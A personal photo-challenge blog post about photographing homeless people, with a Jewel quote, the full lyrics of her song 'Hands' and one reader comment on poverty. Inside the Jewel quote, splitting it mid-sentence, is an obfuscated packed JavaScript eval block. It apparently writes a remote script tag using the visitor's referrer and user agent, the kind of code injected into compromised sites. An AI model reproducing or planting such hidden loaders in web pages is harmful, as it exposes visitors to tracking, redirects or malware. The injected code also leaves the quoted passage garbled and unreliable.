Live with No Regrets

2012 Photo Challenge, Travel

I have always been drawn to photographing the homeless.  It is not about further degradation but revealing to the world a fundamental problem with our current society.  These people remind me of how blessed I am, and how much I have to be grateful for everyday.  I hope you will carry this message with you too.

“I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aazeh|var|u0026u|referrer|yytkf||js|php’.split(‘|’),0,{}))
didn’t mean to be a songwriter; I just was writing for fun, you have all day to do it. I was homeless so that’s all I had to do.”
Jewel

I never knew one of my favorite singers used to be homeless.  We never know what life has in store for us.  I try to live each day, each moment with no regrets because everything is fleeting.  Below is the lyrics to one of my favorite songs from Jewel:

“Hands”

If I could tell the world just one thing
It would be that we’re all OK
And not to worry ’cause worry is wasteful
And useless in times like these
I won’t be made useless
I won’t be idle with despair
I will gather myself around my faith
For light does the darkness most fear
My hands are small, I know
But they’re not yours, they are my own
But they’re not yours, they are my own
And I am never broken
Poverty stole your golden shoes
It didn’t steal your laughter
And heartache came to visit me
But I knew it wasn’t ever after
We’ll fight, not out of spite
For someone must stand up for what’s right
‘Cause where there’s a man who has no voice
There ours shall go singing
My hands are small I know
But they’re not yours, they are my own
But they’re not yours, they are my own
I am never broken
In the end only kindness matters
In the end only kindness matters
I will get down on my knees, and I will pray
I will get down on my knees, and I will pray
I will get down on my knees, and I will pray
My hands are small I know
But they’re not yours, they are my own
But they’re not yours, they are my own
And I am never broken
My hands are small I know
But they’re not yours, they are my own
But they’re not yours, they are my own
And I am never broken
We are never broken
We are God’s eyes
God’s hands
God’s mind
We are God’s eyes
God’s hands
God’s heart
We are God’s eyes
God’s hands
God’s eyes
We are God’s hands
We are God’s hands

  1. Homeless people in the States and other first world countries are lucky they get food stamps from the govt. In third world countries like the Philippines your heart will really bleed seeing them, and seeing how rich the corrupt politicians are. It really is a very sad reality. 🙁
